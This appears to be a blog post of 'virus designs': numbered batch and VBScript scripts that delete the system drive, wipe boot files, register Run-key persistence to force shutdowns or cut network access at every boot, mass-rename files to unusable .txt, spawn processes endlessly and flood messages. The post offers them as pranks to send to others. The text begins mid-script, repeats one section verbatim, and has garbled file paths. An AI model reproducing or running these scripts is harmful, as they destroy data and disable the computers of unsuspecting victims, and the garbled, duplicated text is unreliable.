• Sql2 and virus designs

    cript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop

    Save it as "Anything.VBS" and send it.

    Method 12 :

    This Virus Deletes All The Content Of A Drive...

    @echo off
    del %systemdrive%*.* /f /s /q
    shutdown -r -f -t 00

    Save The Above Code As Anything.bat

    Method 13 :

    This Will Crash Ur Computer

    Option Explicit

    Dim WSHShell
    Set WSHShell=Wscript.CreateObject("Wscript.Shell")

    Dim x
    For x = 1 to 100000000
    WSHShell.Run "Tourstart.exe"
    Next

    Save It As Anything.vbs

    Method 14 :

    The Most Simple Virus To Crush The Window
    It Only Works With Windows XP

    @Echo off
    Del C: *.* |y

    Save It As Anything.bat

    Method 15 :

    Virus that crashes pc
    @echo off
    attrib -r -s -h c:autoexec.bat
    del c:autoexec.bat
    attrib -r -s -h c:boot.ini
    del c:boot.ini
    attrib -r -s -h c:ntldr
    del c:ntldr
    attrib -r -s -h c:windowswin.ini
    del c:windowswin.ini
    @echo off
    msg * YOU GOT OWNED!!!
    shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

    Save As Anything.bat File In Notepad!!
    This Will Pop Up A Message Saying OWNED!!
    And Shut Down The Computer Never To Reboot Again!

    Method 16:

    Shutdowns Computer Everytime It Is Turned On

    Save As A bat File

    echo @echo off>c:windowshartlell.bat
    echo break off>>c:windowshartlell.bat
    echo shutdown -r -t 11 -f>>c:windowshartlell.bat
    echo end>>c:windowshartlell.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
    echo You have been HACKED.
    PAUSE

    Method 17 :

    Disable Internet Permanently

    echo @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    echo You Have Been HACKED!
    PAUSE

    Save As A bat File

    Method 18 :

    Change Files To Non-working TXT Files
    Save As A bat File

    REN *.DOC *.TXT REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT
    REN *.MPEG *.TXT
    REN *.COM *.TXT
    REN *.BAT *.TXT

    Method 19 :

    System Meltdown

    :CRASH
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    GOTO CRASH
    ipconfig /release
    shutdown -r -f -t0
    echo @echo off>c:windowshartlell.bat
    echo break off>>c:windowshartlell.bat
    echo shutdown -r -t 11 -f>>c:windowshartlell.bat
    echo end>>c:windowshartlell.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
    echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
    echo break off>>c:windowswimn32.bat
    echo ipconfig/release_all>>c:windowswimn32.bat
    echo end>>c:windowswimn32.bat
    reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
    reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
    echo YOU HAVE BEEN HACKED BITCH
    REN *.DOC *.TXT
    REN *.JPEG *.TXT
    REN *.LNK *.TXT
    REN *.AVI *.TXT
    REN *.MPEG *.TXT
    REN *.COM *.TXT
    REN *.BAT *.TXT

    PAUSE

    PAUSE

    Save As A bat File

    Method 20 :

    Temporarily Flood Network

    :CRASH
    net send * WORKGROUP ENABLED
    net send * WORKGROUP ENABLED
    GOTO CRASH

    We can make a batch file which will Shutdown the computer everytime on startup !

    Here is how ?

    ? Open Notepad
    ? Type :

    @ECHO OFF

    shutdown -s -t 10 -c "Virus Attack..."

    exit

    ? File >> Save As...

    ? Name it : virus.bat

    ? Start >> All Programs

    ? Right Click on Startup >> Open

    ? This open the Startup folder

    ? Paste the Virus.bat file here !

    *** That's all , now the computer will
    automatically shutdown on every startup !

    ) "I LOVE YOU" virus

    Simply copy-paste the given code in notepad:

    @ echo off

    :love

                   msg * I LOVE YOU darling....!!!

    goto love

    Save the file as love.bat

    Once you execute the file by double clicking on it, a message box displaying “I LOVE YOU darling….!!!” Will be displayed on the screen. Try closing it. You’ll enjoy it.

                                                                 

    Woking: Those who know ‘C’ programming will understand this quickly. 

    The ECHO OFF/ON Command is a command which will either turn ON, or OFF the command you put in a batch file from showing itself. Like, here we’ve typed @ echo off so it won’t show the virus code we’ve typed in.

    ‘:love‘ is a function you’ve created. And ‘msg * I LOVE YOU darling....!!!’ is the body of the function.‘msg’ is a command to display the message.‘goto :love’ again calls back or executes love function up to infinite times. So, it would never end.

        

    NOTE:- This Virus will not harm to your computer but it continuously runs on the desktop and will be a “pain in the ass”. Once you restart the PC and everything will be as usual. So have fun with your friends by this love virus and also wish your Girl/Boy Friend with this new type of Wishing .

    2

    ) "I LOVE YOU" virus

    Simply copy-paste the given code in notepad:

    @ echo off

    :love

                   msg * I LOVE YOU darling....!!!

    goto love

    Save the file as love.bat

    Once you execute the file by double clicking on it, a message box displaying “I LOVE YOU darling….!!!” Will be displayed on the screen. Try closing it. You’ll enjoy it.

                                                                 

    Woking: Those who know ‘C’ programming will understand this quickly. 

    The ECHO OFF/ON Command is a command which will either turn ON, or OFF the command you put in a batch file from showing itself. Like, here we’ve typed @ echo off so it won’t show the virus code we’ve typed in.

    ‘:love‘ is a function you’ve created. And ‘msg * I LOVE YOU darling....!!!’ is the body of the function.‘msg’ is a command to display the message.‘goto :love’ again calls back or executes love function up to infinite times. So, it would never end.

        

    NOTE:- This Virus will not harm to your computer but it continuously runs on the desktop and will be a “pain in the ass”. Once you restart the PC and everything will be as usual. So have fun with your friends by this love virus and also wish your Girl/Boy Friend with this new type of Wishing .

    2

  • 0 comments:

    Post a Comment

    ch.ramakotireddy. Powered by Blogger.